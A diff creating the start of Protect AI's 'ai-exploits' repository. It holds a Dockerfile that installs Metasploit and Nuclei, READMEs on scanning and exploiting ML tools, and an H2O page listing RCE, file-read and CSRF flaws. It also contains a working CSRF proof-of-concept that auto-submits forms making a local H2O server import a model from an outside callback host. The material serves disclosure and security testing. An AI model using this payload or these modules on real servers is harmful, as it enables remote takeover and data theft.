protectai
diff --git a/‎.gitignore
+160 b/‎.gitignore
+160
diff --git a/‎Dockerfile
+18 b/‎Dockerfile
+18
diff --git a/‎LICENSE
+13 b/‎LICENSE
+13
diff --git a/‎README.md
+104 b/‎README.md
+104
diff --git a/‎h2o/README.md
+60 b/‎h2o/README.md
+60
diff --git a/‎h2o/csrf-templates/h2o-rce-csrf.html
+31 b/‎h2o/csrf-templates/h2o-rce-csrf.html
+31
@@ -0,0 +1,160 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+cover/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+.pybuilder/
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+#   For a library or package, you might want to ignore these files since the code is
+#   intended to run in multiple environments; otherwise, check them in:
+# .python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# poetry
+#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
+#   This is especially recommended for binary packages to ensure reproducibility, and is more
+#   commonly ignored for libraries.
+#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
+#poetry.lock
+
+# pdm
+#   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
+#pdm.lock
+#   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
+#   in version control.
+#   https://pdm.fming.dev/#use-with-ide
+.pdm.toml
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+
+# pytype static type analyzer
+.pytype/
+
+# Cython debug symbols
+cython_debug/
+
+# PyCharm
+#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
+#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
+#  and can be added to the global gitignore or merged into this file.  For a more nuclear
+#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
+#.idea/
@@ -0,0 +1,18 @@
+FROM golang:latest
+
+RUN apt-get update \
+    && apt-get -y install python3 python3-setuptools python3-pip python3-requests
+
+WORKDIR /root
+
+RUN go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
+
+RUN curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall \
+    && chmod 755 msfinstall \
+    && ./msfinstall
+
+ENV PYTHONUNBUFFERED 1
+ENV PYTHONPATH=/opt/metasploit-framework/embedded/framework/lib/msf/core/modules/external/python
+
+COPY **/msfmodules/*.py /root/.msf4/modules/exploits/protectai/
+COPY **/nuclei-templates/*.yaml /root/nuclei-templates/
@@ -0,0 +1,13 @@
+Copyright [2023] [Protect AI]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
@@ -0,0 +1,104 @@
+<div align="center">
+
+# AI Exploits
+
+  <img width="250" src="https://github.com/protectai/ai-exploits/assets/5151193/4cd73d59-c97e-4df0-abb0-6a0a558e387e" alt="AI Exploits Logo">
+
+</div>
+
+The AI world has a security problem and it's not just in the inputs given to LLMs such as ChatGPT. Based 
+on research done by [Protect AI](https://protectai.com) and independent security experts on the [Huntr](https://huntr.com) Bug Bounty Platform, there are far more impactful and practical attacks 
+against the tools, libraries and frameworks used to build, train, and deploy machine learning models. Many of these 
+attacks lead to complete system takeovers and/or loss of sensitive data, models, or credentials most often without the need
+for authentication.
+
+With the release of this repository, [Protect AI](https://protectai.com) hopes to demystify to the Information Security community what pratical attacks against AI/Machine Learning infrastructure look like in the real world and raise awareness to the amount of vulnerable components that currently exist in the AI/ML ecosystem.
+
+## Overview
+
+This repository, **ai-exploits**, is a collection of exploits and scanning templates for responsibly disclosed vulnerabilities affecting machine learning tools.
+
+Each vulnerable tool has a number of subfolders containing three types of utilities: [Metasploit](https://github.com/rapid7/metasploit-framework) modules, [Nuclei](https://github.com/projectdiscovery/nuclei) templates
+and CSRF templates. Metasploit modules are for security professionals looking to exploit the vulnerabilies and Nuclei templates are for scanning a large number of remote servers to determine if they're vulnerable.
+
+## Setup & Usage
+
+The easiest way to use the modules and scanning templates is to build and run the Docker image provided by the `Dockerfile` in this repository. The Docker image will have Metasploit and Nuclei already installed along with all the necessary configuration.
+
+###  Docker
+
+1. Build the image:
+
+   ```bash
+   docker build -t protectai/ai-exploits https://github.com/protectai/AI-exploits
+   ```
+
+2. Run the docker image:
+   
+   ```bash
+   docker run -it --rm protectai/ai-exploits /bin/bash
+   ```
+
+The latter command will drop you into a `bash` session in the container with `msfconsole` and `nuclei` ready to go.
+
+### Using the Metasploit Modules
+
+#### With Docker
+
+Start the Metasploit console (the new modules will be available under the `exploits/protectai` category), load a module, set the options, and run the exploit.
+
+   ```bash
+   msfconsole
+   msf6 > use exploit/protectai/ray_job_rce
+   msf6 exploit(protectai/ray_job_rce) > set RHOSTS <target IP>
+   msf6 exploit(protectai/ray_job_rce) > run
+   ```
+
+#### With Metasploit Installed Locally
+
+Create a folder `~/.msf4/modules/exploits/protectai` and copy the exploit modules into it.
+
+   ```bash
+   mkdir -p ~/.msf4/modules/exploits/protectai
+   cp ai-exploits/ray/msfmodules/* ~/.msf4/modules/exploits/protectai
+   msfconsole
+   msf6 > use exploit/protectai/<exploit_name.py>
+   ```
+
+### Using Nuclei Templates
+
+Nuclei is a vulnerability scanning engine which can be used to scan large numbers of servers for known vulnerabilities in web applications and networks.
+
+Navigate to nuclei templates folder such as `ai-exploits/mlflow/nuclei-templates`. In the Docker container these are stored in the `/root/nuclei-templates` folder. Then simply point to the template file and the target server.
+   ```
+   cd ai-exploits/mlflow/nuclei-templates
+   nuclei -t mlflow-lfi.yaml -u http://<target>:<port>`
+   ```
+
+### Using CSRF Templates
+
+Cross-Site Request Forgery (CSRF) vulnerabilities enable attackers to stand up a web server hosting a malicious HTML page 
+that will execute a request to the target server on behalf of the victim. This is a common attack vector for exploiting 
+vulnerabilities in web applications, including web applications which are only exposed on the localhost interface and 
+not to the broader network. Below is a simple demo example of how to use a CSRF template to exploit a vulnerability in a 
+web application.
+
+Start a web server in the csrf-templates folder. Python allows one to stand up a simple web server in any 
+directory. Navigate to the template folder and start the server.
+
+   ```bash
+   cd ai-exploits/ray/csrf-templates
+   python3 -m http.server 9999
+   ```
+
+Now visit the web server address you just stood up (http://127.0.0.1:9999) and hit F12 to open 
+the developer tools, then click the Network tab. Click the link to ray-cmd-injection-csrf.html. You should see that 
+the browser sent a request to the vulnerable server on your behalf.
+
+## Contribution Guidelines
+
+We welcome contributions to this repository. Please read our [Contribution Guidelines](CONTRIBUTING.md) for more information on how to contribute.
+
+## License
+
+This project is licensed under the [Apache 2.0 License](LICENSE).
@@ -0,0 +1,60 @@
+# H2O Vulnerabilities and Exploits
+
+## Overview
+H2O-3 is a low-code machine learning platform that enables data scientists and analysts to build and deploy machine 
+learning models using an easy web interface by just importing their data. A default, out of the box installation has no 
+authentication and is exposed to the network.
+
+## Vulnerabilities
+
+### CSRF (Cross-Site Request Forgery)
+
+- **Description**: H2O is vulnerable to CSRF due to the lack of proper CSRF protection. Attackers can exploit this vulnerability to perform unwanted actions on a web application in which the user is currently authenticated.
+- **Impact**: This could lead to unauthorized actions being taken on behalf of the authenticated user.
+
+### RCE (Remote Code Execution)
+
+- **Description**: H2O allows the importation of POJO models which are Java code objects. This can be exploited to execute arbitrary Java code on the server, leading to Remote Code Execution (RCE).
+- **Impact**: Since H2O does not require authentication by default and is exposed to the network, it can be compromised remotely, allowing an attacker to take full control of the server.
+
+### LFI (Local File Inclusion)
+
+- **Description**: There is a Local File Inclusion (LFI) vulnerability in H2O, where a remote API call can be made to read the entire file system on the server.
+- **Impact**: This vulnerability allows an attacker to read sensitive files from the server, leading to information disclosure and potentially further exploitation.
+
+## Utilities
+
+### Metasploit Modules
+
+- **h2o_pojo_import_rce**: Exploits the RCE vulnerability to gain a remote shell on the server.
+- **h2o_importfiles_lfi**: Exploits the LFI vulnerability to read files from the server's file system.
+- **h2o_typeahead_api**: Exploits the ability of H2O to list files and folders on the vulnerable server.
+
+### CSRF Template
+
+- **h2o-rce-csrf** - A pre-crafted HTML template that can be used to demonstrate the CSRF to RCE vulnerability in H2O.
+
+### Nuclei Template
+
+- **h2o-importfiles-lfi**: Identifies LFI vulnerabilities through the import files functionality in H2O.
+- **h2o-apl**: Scans for the arbitrary path lookup endpoints in H2O.
+- **h2o-dashboard**: Looks for H2O dashboard endpoints that may be unprotected.
+- **h2o-pojo-rce**: Scans for the RCE vulnerability via POJO model importation in H2O.
+
+## Reports
+
+ - **@DanMcInerney** - https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c/
+ - **@p0cas** - https://huntr.com/bounties/9881569f-dc2a-437e-86b0-20d4b70ae7af/
+ - **Sierra Haex** - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/
+
+## Disclaimer
+
+The vulnerabilities and associated exploits provided in this repository are for educational and ethical security testing purposes only.
+
+## Contribution
+
+Contributions to improve the exploits or documentation are welcome.
+
+## License
+
+All exploits and templates in this repository are released under the Apache 2.0 License.
@@ -0,0 +1,31 @@
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+    <form action="http://localhost:54321/3/ModelBuilders/generic/parameters" method="POST">
+      <input type="hidden" name="model&#95;id" value="generic&#45;68510df2&#45;f19a&#45;4871&#45;8285&#45;9321a7ef6d51" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <form action="http://localhost:54321/3/ModelBuilders/generic/parameters" method="POST">
+      <input type="hidden" name="model&#95;id" value="generic&#45;68510df2&#45;f19a&#45;4871&#45;8285&#45;9321a7ef6d51" />
+      <input type="hidden" name="path" value="http&#58;&#47;&#47;8y7xrazsiuejf3d8u775uhspdgj77yvn&#46;oastify&#46;com" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <form action="http://localhost:54321/3/ModelBuilders/generic/parameters" method="POST">
+      <input type="hidden" name="model&#95;id" value="generic&#45;68510df2&#45;f19a&#45;4871&#45;8285&#45;9321a7ef6d51" />
+      <input type="hidden" name="path" value="http&#58;&#47;&#47;8y7xrazsiuejf3d8u775uhspdgj77yvn&#46;oastify&#46;com" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <form action="http://localhost:54321/3/ModelBuilders/generic" method="POST">
+      <input type="hidden" name="model&#95;id" value="generic&#45;68510df2&#45;f19a&#45;4871&#45;8285&#45;9321a7ef6d51" />
+      <input type="hidden" name="path" value="http&#58;&#47;&#47;8y7xrazsiuejf3d8u775uhspdgj77yvn&#46;oastify&#46;com" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      history.pushState('', '', '/');
+      document.forms[0].submit();
+      document.forms[1].submit();
+      document.forms[2].submit();
+      document.forms[3].submit();
+    </script>
+  </body>
+</html>